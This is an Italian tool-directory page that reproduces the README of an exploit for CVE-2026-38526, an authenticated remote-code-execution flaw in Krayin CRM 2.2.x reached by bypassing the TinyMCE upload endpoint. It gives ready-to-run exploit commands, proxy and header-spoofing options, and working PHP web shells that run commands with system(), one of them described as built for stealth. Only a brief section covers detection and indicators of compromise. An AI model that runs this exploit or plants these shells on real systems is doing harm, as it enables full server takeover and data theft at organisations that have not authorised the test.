Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — Exploit CVE-2026-38526 per Krayin CRM v2.2.x - RCE autenticato tramite bypass del caricamento file di TinyMCE. Include shell interattiva, payload multi-tipo, generazione automatica di shell e verifica. Autore: Sudeepa Wanigarathna. Solo per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingGenerazione di Shellcode
GitHub
cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Exploit CVE-2026-38526 per Krayin CRM v2.2.x - RCE autenticato tramite bypass del caricamento file di TinyMCE. Include shell interattiva, payload multi-tipo, generazione automatica di shell e verifica. Autore: Sudeepa Wanigarathna. Solo per test autorizzati.

Vedi Repository
3162 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔓 Krayin CRM v2.2.x - Exploit di Esecuzione Remota di Codice Autenticata

License: MIT CVE-2026-38526

⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI - L'uso non autorizzato è illegale e non etico.

📋 Panoramica

Questo strumento di exploit dimostra una vulnerabilità critica di esecuzione remota di codice autenticata (RCE) scoperta in Krayin CRM versione 2.2.x. La vulnerabilità risiede nella funzionalità di caricamento file di TinyMCE, che consente agli amministratori autenticati di caricare ed eseguire codice PHP arbitrario sul server.

ProprietàValore
ID CVECVE-2026-38526
Software AffettoKrayin CRM v2.2.x
Tipo di VulnerabilitàEsecuzione Remota di Codice Autenticata (RCE)
Autenticazione RichiestaSì (accesso a livello Amministratore)
ImpattoCompromissione completa del sistema
Punteggio CVSS8.8 (Alto)

🚨 Dettagli della Vulnerabilità

La vulnerabilità deriva da una validazione insufficiente del tipo di file nell'endpoint di caricamento file di TinyMCE (/admin/tinymce/upload). Un amministratore autenticato può:

  • Caricare un file PHP camuffato con un tipo MIME di immagine.
  • Il file viene memorizzato in una posizione accessibile dal web.
  • L'attaccante può quindi eseguire codice PHP arbitrario sul server.

Versioni Affette

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Tutte le versioni 2.2.x precedenti al rilascio della patch

✨ Caratteristiche

  • Tipi di Shell Multipli: Base, Avanzata, Minima, File Manager e Personalizzata.
  • Shell Interattiva: Interfaccia simile a un terminale con cronologia dei comandi.
  • Caricamento File: Carica file aggiuntivi tramite la shell.
  • Estrazione Token CSRF: Gestione automatica della protezione CSRF.
  • Supporto Proxy: Instradamento del traffico attraverso proxy HTTP/HTTPS.
  • Formati di Output Flessibili: Testo, JSON o modalità Silenziosa.
  • Logica di Riprova: Riprova automatica in caso di fallimenti di connessione.
  • Intestazioni Personalizzate: Supporto per intestazioni HTTP personalizzate.
  • Modalità Verbosa: Output di debug dettagliato.
  • Supporto SSL: Verifica facoltativa del certificato SSL.

📦 Installazione

Requisiti

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Installazione Rapida

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

File dei Requisiti (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Utilizzo

Sintassi di Base del Comando

python3 exploit.py -t <URL_DESTINAZIONE> -u <NOME_UTENTE> -p <PASSWORD> [OPZIONI]

Parametri Richiesti

ParametroDescrizione
-t, --targetURL di destinazione (es. http://192.168.1.100)
-u, --usernameNome utente o email dell'amministratore
-p, --passwordPassword dell'amministratore

Esempi di Utilizzo Comuni

# Sfruttamento base con shell generata
python3 exploit.py -t http://target.com -u [email protected] -p password

# Caricamento di un file shell PHP personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generazione di shell avanzata con modalità interattiva
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generazione di un file shell senza sfruttamento
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Utilizzo con proxy per test/debug
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Output JSON per automazione
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modalità verbosa con timeout personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent e intestazioni personalizzate
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipi di Shell

  1. Shell Base (basic) Esecuzione semplice di comandi con la funzione system().

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avanzata (advanced) Shell ricca di funzionalità con:

    • Metodi multipli di esecuzione comandi
    • Bella interfaccia web simile a un terminale
    • Supporto cronologia comandi
    • Visualizzazione dell'utente corrente e nome host
  3. Shell Minima (minimal) Impronta minima per la furtività.

    <?php system($_GET["cmd"]); ?>
    
  4. File Manager (file_manager) Interfaccia completa per la gestione dei file:

    • Caricamento file
    • Eliminazione file
    • Creazione directory
    • Navigazione
    • Visualizzatore permessi file
  5. Shell Personalizzata (custom) Usa il tuo file shell PHP con il parametro -f.

📝 Formati di Output

Formato Testo (Default)

Output colorato leggibile dall'uomo, adatto per uso interattivo.

Formato JSON (-o json)

Formato leggibile dalla macchina per automazione e integrazione.

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silenzioso (-q, --quiet)

Nessun output tranne che per gli errori. Utile per elaborazione batch.

⚙️ Opzioni Avanzate

OpzioneDescrizioneDefault
--timeoutTimeout della richiesta in secondi30
--retryNumero di tentativi di riprova3
--retry-delayRitardo tra i tentativi in secondi2
--user-agentStringa User-Agent personalizzataUA browser default
--headerIntestazioni HTTP personalizzate (Key: Value)Nessuno
--verify-sslVerifica certificati SSLFalse
--proxyURL proxy HTTP/HTTPSNessuno
-v, --verboseAbilita output di debugFalse
-q, --quietSopprime tutto l'outputFalse

Esempio di Intestazioni Personalizzate

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Rilevamento e Prevenzione

Segni di Compromissione (IoC)

  • File da Monitorare:

    • File PHP insoliti in public/storage/upload/
    • File con doppia estensione (es. image.php.jpg)
    • Nuovi file con nomi sospetti
  • Log da Controllare:

    • Richieste POST a /admin/tinymce/upload
    • Orari di accesso amministratore insoliti
    • Tentativi di autenticazione falliti
  • Indicatori di Sistema:

    • Processi in esecuzione inaspettati
    • Nuovi cron job
    • File di sistema modificati

Misure di Prevenzione

Scarica lo strumento